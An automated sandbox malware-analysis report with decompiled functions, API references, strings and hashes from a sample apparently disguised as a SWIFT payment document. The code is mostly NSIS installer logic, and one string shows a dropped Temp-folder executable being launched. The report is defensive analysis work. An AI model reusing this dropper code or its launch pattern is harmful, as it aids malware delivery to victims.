Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: H7B${
API String ID: 590372296-2256286769
Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x421718, _t146);
							_t87 = E00406A35(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x421718, _t146);
								_t89 = E00405FE2(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x421708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423738 == _t158) {
									E00404A0E();
								}
								 *0x423738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\engineer\\AppData\\Local\\Temp") {
									E004066A5(_t146, 0x423748, _t167, 0, _t125);
									if(lstrcmpiW(0x428200, 0x423748) != 0) {
										lstrcatW(_t146, 0x428200);
									}
								}
								 *0x423738 =  *0x423738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x429238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x00404ab5
0x00404abb
0x00404ac1
0x00404ace
0x00404adc
0x00404adf
0x00404ae7
0x00404aed
0x00404aed
0x00404af9
0x00404afc
0x00404b6a
0x00404b71
0x00404c48
0x00404c4f
0x00404c5e
0x00404c5e
0x00404c62
0x00404c6c
0x00404c79
0x00404c7b
0x00404c7b
0x00404c89
0x00404c90
0x00404c97
0x00404c9a
0x00404cd6
0x00404cd8
0x00404cde
0x00404ce3
0x00404ce7
0x00404ce9
0x00404ce9
0x00404d05
0x00000000
0x00404d07
0x00404d0a
0x00404d18
0x00404d1e
0x00404d1f
0x00404d22
0x00404d25
0x00000000
0x00404d25
0x00404c9c
0x00404c9e
0x00404ca2
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ca4
0x00404ca4
0x00404cb1
0x00404cb6
0x00000000
0x00000000
0x00404cba
0x00404cbc
0x00404cbc
0x00404cc5
0x00404cc7
0x00404ccc
0x00404ccf
0x00404cd4
0x00000000
0x00000000
0x00000000
0x00000000
0x00404cd4
0x00404d31
0x00404d3b
0x00404d3e
0x00404d41
0x00404d48
0x00404d48
0x00404d4a
0x00404d4a
0x00404d4f
0x00404d51
0x00404d59
0x00404d60
0x00404d62
0x00404d6d
0x00404d6d
0x00404d62
0x00404d7d
0x00404d87
0x00404d8f
0x00404daa
0x00404d91
0x00404d9a
0x00404d9a
0x00404d8f
0x00404daf
0x00404db4
0x00404db9
0x00404dc2
0x00404dc2
0x00404dcb
0x00404dcd
0x00404dcd
0x00404dd9
0x00404de1
0x00404deb
0x00404deb
0x00404df0
0x00000000
0x00404df0
0x00404c9a
0x00404c51
0x00404c58
0x00000000
0x00000000
0x00000000
0x00404c58
0x00404b77
0x00404b80
0x00404b9a
0x00404b9f
0x00404ba9
0x00404bb0
0x00404bbc
0x00404bbf
0x00404bc2
0x00404bc9
0x00404bd1
0x00404bd4
0x00404bd8
0x00404bdf
0x00404be7
0x00404c41
0x00404be9
0x00404bea
0x00404bf1
0x00404bfb
0x00404c03
0x00404c10
0x00404c24
0x00404c28
0x00404c28
0x00404c24
0x00404c2d
0x00404c3a
0x00404c3a
0x00404be7
0x00000000
0x00404b9f
0x00404b8d
0x00000000
0x00000000
0x00404b93
0x00000000
0x00404afe
0x00404b0b
0x00404b14
0x00404b21
0x00404b21
0x00404b28
0x00404b2e
0x00404b37
0x00404b3a
0x00404b3d
0x00404b45
0x00404b48
0x00404b4b
0x00404b51
0x00404b58
0x00404b5f
0x00404df6
0x00404e08
0x00404b65
0x00404b68
0x00000000
0x00404b68
0x00404b5f

APIs

GetDlgItem.USER32 ref: 00404B04
SetWindowTextW.USER32(00000000,?), ref: 00404B2E
SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
CoTaskMemFree.OLE32(00000000), ref: 00404BEA
lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v,00423748,00000000,?,?), ref: 00404C1C
lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v), ref: 00404C28
SetDlgItemTextW.USER32 ref: 00404C3A

Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF

Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,746AFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
Part of subcall function 004068EF: CharNextW.USER32(?,00000000,746AFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
Part of subcall function 004068EF: CharPrevW.USER32(?,?,746AFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979

GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18

Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E

Strings

"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v, xrefs: 00404C16, 00404C1B, 00404C26
C:\Users\user\AppData\Local\Temp, xrefs: 00404C05
A, xrefs: 00404BD8
H7B, xrefs: 00404BB2

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v$A$C:\Users\user\AppData\Local\Temp$H7B
API String ID: 2624150263-3672444555
Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\engineer\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
0x004022a0
0x004022a3
0x004022ac
0x004022af
0x004022b8
0x004022be
0x004022c0
0x004022ce
0x004022ce
0x004022d1
0x004022d7
0x004022d7
0x004022da
0x004022e0
0x004022e6
0x004022fb
0x00000000
0x00000000
0x00000000
0x004022e6
0x004022f1
0x00402c2d
0x00402c39

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00402269

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 542301482-1104044542
Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29

Uniqueness

Uniqueness Score: -1.00%

Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
